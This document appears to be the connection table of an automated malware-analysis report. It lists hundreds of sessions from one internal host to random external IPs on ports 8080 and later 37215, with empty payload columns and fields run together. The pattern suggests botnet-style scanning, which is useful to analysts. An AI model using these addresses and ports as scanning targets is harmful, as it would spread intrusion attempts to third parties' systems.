                                                        24756192.168.2.234619239.162.21.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24757192.168.2.2347534190.201.186.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24758192.168.2.2359176175.93.210.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24759192.168.2.2355722150.229.16.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24760192.168.2.2343654155.172.150.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24761192.168.2.2341992206.181.182.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24762192.168.2.235494825.203.55.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24763192.168.2.234872076.252.74.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24764192.168.2.233420263.41.56.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24765192.168.2.2348706137.47.25.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24766192.168.2.235281842.155.200.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24767192.168.2.2343414199.186.177.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24768192.168.2.2334906103.166.90.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24769192.168.2.236015865.38.2.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24770192.168.2.235220847.15.115.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24771192.168.2.235248276.31.208.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24772192.168.2.233808420.105.85.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24773192.168.2.2359768188.123.226.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24774192.168.2.2356638183.197.43.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24775192.168.2.2359020147.69.20.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24776192.168.2.2356288161.50.222.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24777192.168.2.2354650169.63.103.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24778192.168.2.234347248.180.223.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24779192.168.2.234388613.131.116.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24780192.168.2.234996097.130.206.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24781192.168.2.234746076.107.232.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24782192.168.2.2356564106.215.255.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24783192.168.2.2352454129.233.36.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24784192.168.2.233694065.121.154.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24785192.168.2.235474069.99.203.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24786192.168.2.233577462.58.180.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24787192.168.2.233635275.184.237.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24788192.168.2.235603832.77.168.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24789192.168.2.235441843.24.154.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24790192.168.2.2350600201.52.214.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24791192.168.2.2333544194.27.62.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24792192.168.2.2334406170.196.245.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24793192.168.2.233827097.72.188.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24794192.168.2.233861458.83.98.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24795192.168.2.2353082188.106.168.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24796192.168.2.2337376137.67.191.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24797192.168.2.2342116133.23.9.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24798192.168.2.235280866.223.62.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24799192.168.2.233821840.61.170.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24800192.168.2.234448431.61.144.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24801192.168.2.2339810131.147.217.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24802192.168.2.2340828151.193.66.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24803192.168.2.234072277.52.247.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24804192.168.2.235034847.155.184.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24805192.168.2.2340004169.34.223.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24806192.168.2.234313241.39.219.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24807192.168.2.2348080136.202.172.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24808192.168.2.2360050222.91.56.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24809192.168.2.2352928166.94.54.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24810192.168.2.2340336178.251.18.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24811192.168.2.2342426181.49.151.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24812192.168.2.235696232.89.185.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24813192.168.2.235181884.36.248.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24814192.168.2.2341876160.106.3.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24815192.168.2.2359930106.71.81.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24816192.168.2.2347386104.238.33.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24817192.168.2.2360674207.61.157.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24818192.168.2.233973218.212.1.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24819192.168.2.233410463.77.136.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24820192.168.2.2357216101.86.3.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24821192.168.2.235267866.227.235.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24822192.168.2.2351092110.127.45.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24823192.168.2.2341260130.174.176.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24824192.168.2.2339924107.62.21.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24825192.168.2.23365108.248.155.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24826192.168.2.2339080197.113.5.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24827192.168.2.2360660180.87.232.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24828192.168.2.233874638.31.87.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24829192.168.2.2346372183.231.117.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24830192.168.2.235605279.40.78.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24831192.168.2.2340928166.75.69.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24832192.168.2.233908244.20.228.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24833192.168.2.2359434194.74.30.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24834192.168.2.2349540210.91.212.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24835192.168.2.234885866.6.249.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24836192.168.2.2341674196.180.101.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24837192.168.2.234047646.73.93.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24838192.168.2.2338292160.154.209.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24839192.168.2.235764246.92.68.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24840192.168.2.23547361.3.73.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24841192.168.2.2351874150.235.173.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24842192.168.2.2337796187.77.96.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24843192.168.2.2336804199.248.187.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24844192.168.2.2342038212.28.193.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24845192.168.2.235993632.134.206.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24846192.168.2.2333022222.109.254.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24847192.168.2.2338510221.16.6.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24848192.168.2.2340404156.135.197.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24849192.168.2.2339328133.204.102.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24850192.168.2.2357404102.6.127.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24851192.168.2.234220613.139.98.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24852192.168.2.235758435.253.49.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24853192.168.2.2337574138.132.105.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24854192.168.2.2334682205.9.59.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24855192.168.2.2357552216.176.218.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24856192.168.2.2345696144.158.233.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24857192.168.2.2350250132.79.42.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24858192.168.2.2350652218.222.131.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24859192.168.2.234371685.207.196.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24860192.168.2.234116492.68.210.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24861192.168.2.235285078.34.221.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24862192.168.2.234161219.43.73.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24863192.168.2.235258065.46.67.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24864192.168.2.2339324194.89.3.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24865192.168.2.235180234.75.172.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24866192.168.2.2338746193.85.239.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24867192.168.2.23487144.30.32.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24868192.168.2.233701039.234.172.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24869192.168.2.233906814.39.9.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24870192.168.2.2351754190.236.154.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24871192.168.2.235188678.144.244.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24872192.168.2.2334338157.95.231.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24873192.168.2.236079420.94.190.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24874192.168.2.2356204212.36.36.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24875192.168.2.234566893.97.111.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24876192.168.2.2336578209.166.144.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24877192.168.2.233651458.58.158.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24878192.168.2.234956046.46.126.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24879192.168.2.2358856203.72.195.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24880192.168.2.2332968103.56.139.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24881192.168.2.235455214.129.162.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24882192.168.2.2349836160.136.211.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24883192.168.2.234154440.125.230.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24884192.168.2.2357194218.68.42.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24885192.168.2.2334246142.228.91.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24886192.168.2.236068497.167.178.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24887192.168.2.2343238115.138.211.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24888192.168.2.2359350195.239.172.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24889192.168.2.2346782217.100.223.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24890192.168.2.2347840136.28.191.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24891192.168.2.233855453.237.185.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24892192.168.2.2349014222.69.9.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24893192.168.2.233367470.204.56.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24894192.168.2.2335522182.216.209.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24895192.168.2.2354746105.146.161.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24896192.168.2.2350016186.176.151.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24897192.168.2.2339110159.225.7.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24898192.168.2.2343874155.230.222.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24899192.168.2.2357304101.94.225.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24900192.168.2.234945244.154.113.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24901192.168.2.2348224142.225.12.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24902192.168.2.2334456157.172.247.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24903192.168.2.235994619.113.228.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24904192.168.2.233850042.83.251.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24905192.168.2.2358260168.48.34.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24906192.168.2.234216244.29.20.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24907192.168.2.2334504121.73.251.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24908192.168.2.2342348197.223.14.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24909192.168.2.235012090.219.82.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24910192.168.2.233300641.173.244.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24911192.168.2.2347932157.200.144.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24912192.168.2.235516241.61.217.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24913192.168.2.234120241.225.144.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24914192.168.2.2340902197.42.26.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24915192.168.2.2333856157.219.164.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24916192.168.2.2351694179.210.250.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24917192.168.2.235299441.68.116.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24918192.168.2.233280241.98.86.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24919192.168.2.2334574197.77.56.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24920192.168.2.233541085.115.214.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24921192.168.2.235333498.25.191.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24922192.168.2.235252641.78.34.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24923192.168.2.234834041.24.36.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24924192.168.2.2337150157.197.191.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24925192.168.2.2347404197.111.122.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24926192.168.2.2347558157.62.189.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24927192.168.2.2351498157.63.17.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24928192.168.2.2344224157.155.35.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24929192.168.2.2342766197.64.94.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24930192.168.2.233854441.128.180.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24931192.168.2.233757241.23.158.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24932192.168.2.2335976157.84.238.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24933192.168.2.234170641.51.174.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24934192.168.2.235317641.131.32.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24935192.168.2.2333098197.121.237.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24936192.168.2.235398241.176.30.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24937192.168.2.235554041.120.175.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24938192.168.2.233387467.253.217.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24939192.168.2.235249041.245.84.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24940192.168.2.2335296157.66.156.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24941192.168.2.235547441.167.44.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24942192.168.2.2333936197.134.79.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24943192.168.2.235445223.246.105.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24944192.168.2.2335316157.214.186.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24945192.168.2.2355110197.111.70.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24946192.168.2.2341660157.62.101.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24947192.168.2.2346372197.27.249.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24948192.168.2.2356520197.104.164.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24949192.168.2.2338762157.195.124.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24950192.168.2.2332884179.186.227.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24951192.168.2.2349224197.228.153.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24952192.168.2.2352342197.219.227.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24953192.168.2.235752241.245.64.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24954192.168.2.2359550157.167.98.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24955192.168.2.2353548197.199.76.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24956192.168.2.2346838157.243.227.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24957192.168.2.235702831.182.119.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24958192.168.2.2339808197.143.83.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24959192.168.2.2345640197.211.173.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24960192.168.2.235467841.148.5.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24961192.168.2.2344896138.23.210.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24962192.168.2.234764041.15.61.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24963192.168.2.2340148163.134.194.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24964192.168.2.2349916197.78.103.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24965192.168.2.234772848.79.33.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24966192.168.2.2345124197.105.83.137215
